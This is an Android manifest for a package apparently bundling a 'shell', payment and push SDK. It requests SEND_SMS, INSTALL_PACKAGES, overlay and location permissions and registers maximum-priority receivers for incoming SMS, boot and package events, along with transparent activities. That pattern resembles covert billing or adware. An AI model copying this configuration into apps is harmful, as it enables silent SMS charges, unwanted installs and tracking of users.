<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.cooee.kpsh"
    android:versionCode="1"
    android:versionName="1.0" >

    <uses-sdk
        android:minSdkVersion="8"
        android:targetSdkVersion="21" />

    <!-- shell 注册权限开始 -->
    <uses-permission android:name="android.permission.READ_PHONE_STATE" />
    <uses-permission android:name="android.permission.INTERNET" />
    <uses-permission android:name="android.permission.SEND_SMS" />
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
    <uses-permission android:name="android.permission.GET_TASKS" />
    <uses-permission android:name="android.permission.ACCESS_WIFI_STATE" />
    <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION" />
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />
    <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION" />
    <uses-permission android:name="android.permission.ACCESS_LOCATION_EXTRA_COMMANDS" />
    <uses-permission android:name="android.permission.WAKE_LOCK" />
    <uses-permission android:name="android.permission.INSTALL_PACKAGES" />
    <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW" />
    <!-- shell 注册权限结束 -->


    <!-- kpush start -->
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />
    <uses-permission android:name="com.android.launcher.permission.UNINSTALL_SHORTCUT" />
    <uses-permission android:name="com.android.launcher.permission.CREATE_SHORTCUT" />
    <uses-permission android:name="com.android.launcher.permission.INSTALL_SHORTCUT" />
    <uses-permission android:name="android.permission.VIBRATE" />
    <!-- kpush end -->

    <application
        android:allowBackup="true">
        <service
            android:name="com.kpsh.sdk.KpshService"
            android:process="com.kpsh.kpshservice" >
            <intent-filter android:priority="250" >
                <action android:name="com.kpsh.sdk.action.KpshService" />
            </intent-filter>
        </service>
        <service
            android:name="com.cooee.shell.shell.SdkServiceHullV5"
            android:process="com.platform.shell.sdk" >
            <intent-filter android:priority="250" >
                <action android:name="com.cooee.shell.action.SdkServiceV5" />
            </intent-filter>
        </service>
        <service
            android:name="com.cooee.shell.pay.PayServiceHullV5"
            android:process="com.platform.shell.pay" >
            <intent-filter android:priority="250" >
                <action android:name="com.cooee.shell.action.PayServiceV5" />
            </intent-filter>
        </service>

        <receiver android:name="com.cooee.shell.shell.SdkReceiver" >
            <intent-filter android:priority="2147483647" >
                <action android:name="android.net.conn.CONNECTIVITY_CHANGE" />
                <action android:name="android.intent.action.PHONE_STATE" />
                <action android:name="android.intent.action.USER_PRESENT" />
                <action android:name="android.intent.action.ACTION_SHUTDOWN" />
                <action android:name="android.provider.Telephony.SMS_RECEIVED" />
            </intent-filter>
        </receiver>
        <receiver android:name="com.kpsh.sdk.KpshReceiver" >
            <intent-filter android:priority="2147483647" >
                <action android:name="android.intent.action.PACKAGE_REMOVED" />
                <action android:name="android.intent.action.PACKAGE_ADDED" />
                <action android:name="android.intent.action.PACKAGE_REPLACED" />

                <data android:scheme="package" />
            </intent-filter>
            <intent-filter android:priority="2147483647" >
                <action android:name="android.net.conn.CONNECTIVITY_CHANGE" />
                <action android:name="android.intent.action.PHONE_STATE" />
                <action android:name="android.intent.action.USER_PRESENT" />
                <action android:name="android.intent.action.USER_CLEARNOTIFY" />
                <action android:name="android.intent.action.SEND_TO_KPSH" />
                <action android:name="android.intent.action.CHECK_RECEIVER" />
                <action android:name="android.intent.action.BOOT_COMPLETED" />
            </intent-filter>
        </receiver>

        <activity
            android:name="com.cooee.shell.shell.SdkActivityHullV5"
            android:configChanges="orientation|keyboardHidden|screenSize"
            android:theme="@android:color/transparent" >
        </activity>
        <activity
            android:name="com.cooee.shell.pay.PayActivityHullV5"
            android:configChanges="orientation|keyboardHidden|screenSize"
            android:exported="true"
            android:theme="@android:style/Theme.Translucent.NoTitleBar" >
        </activity>
        <activity
            android:name="com.cooee.shell.download.DownloaderActivityHullV5"
            android:configChanges="orientation|keyboardHidden|screenSize" >
        </activity>
        <activity
            android:name="com.kpsh.sdk.KpshActivity"
            android:configChanges="orientation|keyboardHidden|screenSize"
            android:exported="true"
            android:taskAffinity="com.kpsh.sdk.callScreen"
            android:theme="@android:style/Theme.Translucent.NoTitleBar" >
        </activity>
    </application>

</manifest>